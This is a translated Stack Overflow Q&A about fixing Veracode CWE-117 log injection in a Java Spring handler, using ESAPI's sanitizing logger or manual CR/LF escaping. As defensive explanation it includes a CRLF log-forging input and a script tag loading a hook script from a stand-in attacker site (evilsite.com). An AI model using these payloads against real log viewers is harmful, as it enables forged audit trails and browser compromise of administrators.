gpt4 book ai didi

java - 如何修复 Veracode CWE 117(日志输出中和不当)

转载 作者:塔克拉玛干 更新时间:2023-11-03 04:13:09 24 4
gpt4 key购买 nike

有一个 Spring 全局 @ExceptionHandler(Exception.class) 方法可以像这样记录异常:

@ExceptionHandler(Exception.class)
void handleException(Exception ex) {
logger.error("Simple error message", ex);
...

Veracode 扫描表明此日志记录有不正确的日志输出中和,并建议使用 ESAPI 记录器。有没有办法在不将记录器更改为 ESAPI 的情况下修复此漏洞?这是我遇到此问题的代码中唯一的地方,我试图弄清楚如何以最少的更改修复它。也许 ESAPI 有一些我没有注意到的方法?

附言当前记录器是 Log4j 而不是 slf4j

更新:最后我使用了 ESAPI 记录器。我以为它不会使用我的默认日志记录服务,但我错了,它只是使用我的 slf4j 记录器接口(interface)和适当的配置。

private static final Logger logger = ESAPI.getLogger(MyClass.class);
...
logger.error(null, "Simple error message", ex);

ESAPI 具有 log4j 记录器和记录器工厂的扩展。它可以配置在 ESAPI.properties 中使用什么。例如:

ESAPI.Logger=org.owasp.esapi.reference.Log4JLogFactory

最佳答案

Is there any way how to fix this vulnerability without changing logger to ESAPI?

简而言之,是的。

简单描述:

首先了解错误的严重性。主要关注的是伪造日志声明。假设您有这样的代码:

log.error( transactionId + " for user " + username + " was unsuccessful."

如果任何一个变量都在用户控制之下,他们可以通过使用像 \r\n for user foobar was successful\rn 这样的输入来注入(inject)错误的日志语句。从而允许他们伪造日志并掩盖他们的踪迹。 (好吧,在这个人为的案例中,只是让我们更难看到发生了什么。)

第二种攻击方法更像是国际象棋的走法。许多日志都是 HTML 格式的,以便在另一个程序中查看,对于这个例子,我们假设日志是要在浏览器中查看的 HTML 文件。现在我们注入(inject) <script src=”https://evilsite.com/hook.js” type=”text/javascript”></script>并且您将使用最有可能作为服务器管理员执行的利用框架来连接浏览器……因为怀疑 CEO 是否会阅读日志。现在真正的破解可以开始了。

防御:

一个简单的防御措施是确保所有带有用户输入的日志语句使用明显的东西转义字符 '\n' 和 '\r',例如 '֎' 或者您可以执行 ESAPI 所做的并使用下划线转义。只要它一致就真的没关系,只要记住不要在日志中使用会使您感到困惑的字符集。类似于 userInput.replaceAll("\r", "֎").replaceAll("\n", "֎");

我还发现确保详细指定日志格式很有用...这意味着您要确保对日志语句的外观和构建格式有严格的标准,以便更容易捕获恶意用户.所有程序员都要服从党,遵守格式!

为了抵御 HTML 场景,我会使用 [OWASP 编码器项目][1]

至于为什么建议使用 ESAPI 的实现,它是一个久经考验的库,但简而言之,这就是我们所做的。看代码:

/**
* Log the message after optionally encoding any special characters that might be dangerous when viewed
* by an HTML based log viewer. Also encode any carriage returns and line feeds to prevent log
* injection attacks. This logs all the supplied parameters plus the user ID, user's source IP, a logging
* specific session ID, and the current date/time.
*
* It will only log the message if the current logging level is enabled, otherwise it will
* discard the message.
*
* @param level defines the set of recognized logging levels (TRACE, INFO, DEBUG, WARNING, ERROR, FATAL)
* @param type the type of the event (SECURITY SUCCESS, SECURITY FAILURE, EVENT SUCCESS, EVENT FAILURE)
* @param message the message to be logged
* @param throwable the {@code Throwable} from which to generate an exception stack trace.
*/
private void log(Level level, EventType type, String message, Throwable throwable) {

// Check to see if we need to log.
if (!isEnabledFor(level)) {
return;
}

// ensure there's something to log
if (message == null) {
message = "";
}

// ensure no CRLF injection into logs for forging records
String clean = message.replace('\n', '_').replace('\r', '_');
if (ESAPI.securityConfiguration().getLogEncodingRequired()) {
clean = ESAPI.encoder().encodeForHTML(message);
if (!message.equals(clean)) {
clean += " (Encoded)";
}
}

// log server, port, app name, module name -- server:80/app/module
StringBuilder appInfo = new StringBuilder();
if (ESAPI.currentRequest() != null && logServerIP) {
appInfo.append(ESAPI.currentRequest().getLocalAddr()).append(":").append(ESAPI.currentRequest().getLocalPort());
}
if (logAppName) {
appInfo.append("/").append(applicationName);
}
appInfo.append("/").append(getName());

//get the type text if it exists
String typeInfo = "";
if (type != null) {
typeInfo += type + " ";
}

// log the message
// Fix for https://code.google.com/p/owasp-esapi-java/issues/detail?id=268
// need to pass callerFQCN so the log is not generated as if it were always generated from this wrapper class
log(Log4JLogger.class.getName(), level, "[" + typeInfo + getUserInfo() + " -> " + appInfo + "] " + clean, throwable);
}

参见第 398-453 行。这就是 ESAPI 提供的所有转义。我建议也复制单元测试。

[免责声明]:我是 ESAPI 的项目联合负责人。

[1]: https://www.owasp.org/index.php/OWASP_Java_Encoder_Project并确保在进入日志语句时对输入进行正确编码——每一位都与将输入发送回用户时一样多。

关于java - 如何修复 Veracode CWE 117(日志输出中和不当),我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/44949254/

24 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com